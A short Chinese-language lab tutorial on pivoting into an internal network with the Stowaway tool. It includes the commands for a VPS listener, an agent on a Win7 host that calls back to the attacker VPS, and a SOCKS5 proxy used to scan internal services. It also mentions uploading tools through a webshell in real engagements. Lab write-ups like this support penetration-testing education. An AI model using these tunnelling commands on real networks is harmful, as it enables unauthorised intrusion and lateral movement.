VPS注意端口的开放情况,首先是监听端口9999,以及socks5的隧道代理端口5555,要在防火墙上开放。
环境配置
一台虚拟机win7 双网卡(nat和仅主机模式)
一台VPS
一台 win10 (攻击机)
具体的win7配置
仅主机模式的ip需要自己配置为静态ip,让其与物理机不通。
Nat的网卡可通外网
然后起一个web服务(phpstudy搭建)
Win7访问其服务,正常访问
物理机访问服务,无法访问
环境搭建完成之后,那么我们就可以将代理工具分别上传上去(实战的话应该是通过webshell来上传工具到客户端)
将服务端上传到VPS上面
客户端上传到win7上面
执行步骤
服务端vps上执行命令: ./linux_x64_admin -l 9999
客户端win7上执行命令:
Windows_x64_agent -c 47.xxx.xxx.xx3:9999 –reconnect 2
在服务端连接客户端 0代表的是我们的第一个agent
开启socks5代理 端口是5555
然后我们需要在攻击机上面设置代理proxifiter,为了我们可以访问到内网的web服务,达到我们的目标,将代理挂在中转的地方,那么我们通过代理使用工具扫描内网,探测内网服务等操作
也可以将代理直接设置在google代理插件上,这样方便我们直接去访问web服务
也可以通过stowaway本身来进行命令执行操作等等
若有收获,就点个赞吧
0 人点赞
